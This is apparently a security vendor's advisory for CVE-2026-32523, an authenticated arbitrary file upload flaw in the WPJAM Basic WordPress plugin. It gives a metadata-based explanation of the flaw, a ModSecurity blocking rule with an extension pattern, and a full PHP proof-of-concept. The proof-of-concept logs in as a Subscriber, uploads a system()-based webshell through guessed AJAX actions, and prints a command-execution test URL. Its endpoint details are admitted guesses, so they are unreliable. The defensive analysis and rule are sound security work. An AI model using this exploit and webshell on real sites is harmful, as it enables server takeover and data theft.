Atomic Edge analysis of CVE-2026-32523 (metadata-based):
The WPJAM Basic plugin for WordPress versions up to and including 6.9.2 contains an arbitrary file upload vulnerability. This vulnerability affects the plugin’s file upload functionality. Attackers with Subscriber-level authentication can upload malicious files to the server. The CVSS score of 8.8 (High) reflects the low attack complexity and high impact on confidentiality, integrity, and availability.
Atomic Edge research indicates the root cause is CWE-434: Unrestricted Upload of File with Dangerous Type. The vulnerability description states missing file type validation. This suggests the plugin’s upload handler processes files without verifying their MIME type, extension, or content. The plugin likely accepts uploads through WordPress AJAX endpoints or REST API routes. These conclusions are inferred from the CWE classification and standard WordPress plugin patterns, as no source code diff is available for confirmation.
Exploitation requires an authenticated WordPress user account with at least Subscriber privileges. Attackers would identify the vulnerable upload endpoint, typically accessed via /wp-admin/admin-ajax.php with an action parameter containing ‘wpjam’ or the plugin slug. The request would include a multipart form with a malicious file payload. Attackers could upload PHP webshells with extensions like .php, .phtml, or .php5. They might bypass client-side validation by modifying Content-Type headers or using double extensions. Successful exploitation results in the file being stored in a web-accessible directory.
Remediation requires implementing proper file validation. The patched version 6.9.2.1 likely added server-side file type checking. This includes verifying file extensions against an allowlist, checking MIME types, validating file content with magic bytes detection, and restricting upload directories. WordPress plugins should use wp_check_filetype_and_ext() and current_user_can(‘upload_files’) for proper validation and authorization. The fix should also remove uploaded files from web-accessible locations or apply .htaccess restrictions.
Successful exploitation leads to remote code execution. Attackers can upload PHP webshells or other executable files to compromise the entire WordPress installation. This allows complete server control, data theft, privilege escalation, and site defacement. The attacker can execute arbitrary commands, access databases, and establish persistent backdoors. Even with Subscriber privileges, this vulnerability provides full system compromise due to the file upload capability.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-32523 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:10032523,phase:2,deny,status:403,chain,msg:'CVE-2026-32523: WPJAM Basic Arbitrary File Upload via AJAX',severity:'CRITICAL',tag:'CVE-2026-32523',tag:'WordPress',tag:'Plugin:wpjam-basic',tag:'Attack/FileUpload'"
SecRule ARGS_POST:action "@rx ^wpjam_(upload|basic_upload|file_upload|ajax_upload)$"
"chain,t:none"
SecRule FILES "@rx .(php|phtml|php3|php4|php5|php7|phps|phar|inc|pl|cgi|py|sh|exe|dll|bat|cmd|js|jsp|asp|aspx)\.?$"
"t:lowercase,t:urlDecodeUni,msg:'Blocked malicious file upload via WPJAM Basic AJAX endpoint'"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-32523 - WPJAM Basic <= 6.9.2 - Authenticated (Subscriber+) Arbitrary File Upload
<?php
/**
* Proof of Concept for CVE-2026-32523
* Assumptions based on metadata analysis:
* 1. Vulnerable endpoint is /wp-admin/admin-ajax.php
* 2. Action parameter contains 'wpjam' or plugin slug
* 3. File upload parameter is 'file' or similar
* 4. Subscriber authentication required
* 5. No file type validation exists
*/
$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'subscriber_user'; // CHANGE THIS - Subscriber account
$password = 'subscriber_pass'; // CHANGE THIS
// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Create temporary cookie file
$cookie_file = tempnam(sys_get_temp_dir(), 'wpjam_cookie_');
// Initialize cURL session for login
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]),
CURLOPT_COOKIEJAR => $cookie_file,
CURLOPT_COOKIEFILE => $cookie_file,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$response = curl_exec($ch);
// Check login success by looking for WordPress dashboard indicators
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
die('Authentication failed. Check credentials.');
}
// Step 2: Create malicious PHP webshell
$webshell_content = '<?php if(isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); } ?>';
$temp_file = tempnam(sys_get_temp_dir(), 'wpjam_');
file_put_contents($temp_file, $webshell_content);
// Step 3: Attempt file upload through suspected vulnerable endpoint
// Common WordPress AJAX action patterns for upload functionality
$possible_actions = [
'wpjam_upload',
'wpjam_basic_upload',
'wpjam_file_upload',
'wpjam_ajax_upload'
];
foreach ($possible_actions as $action) {
echo "Trying action: $actionn";
$post_fields = [
'action' => $action,
'file' => new CURLFile($temp_file, 'application/x-php', 'shell.php')
];
curl_setopt_array($ch, [
CURLOPT_URL => $ajax_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $post_fields,
CURLOPT_COOKIEFILE => $cookie_file,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => [
'Content-Type: multipart/form-data'
]
]);
$upload_response = curl_exec($ch);
// Check for successful upload indicators
if (strpos($upload_response, 'url') !== false ||
strpos($upload_response, 'success') !== false ||
strpos($upload_response, '.php') !== false) {
echo "Potential success with action: $actionn";
echo "Response: $upload_responsen";
// Extract uploaded file URL from JSON response
$json_response = json_decode($upload_response, true);
if ($json_response && isset($json_response['url'])) {
echo "Uploaded file accessible at: " . $json_response['url'] . "n";
echo "Test with: " . $json_response['url'] . "?cmd=whoamin";
}
break;
}
}
// Cleanup
curl_close($ch);
unlink($cookie_file);
unlink($temp_file);
if (!isset($json_response['url'])) {
echo "Exploit attempt completed. No clear success indicator found.n";
echo "Manual verification required: check uploads directory for shell.phpn";
}
?>
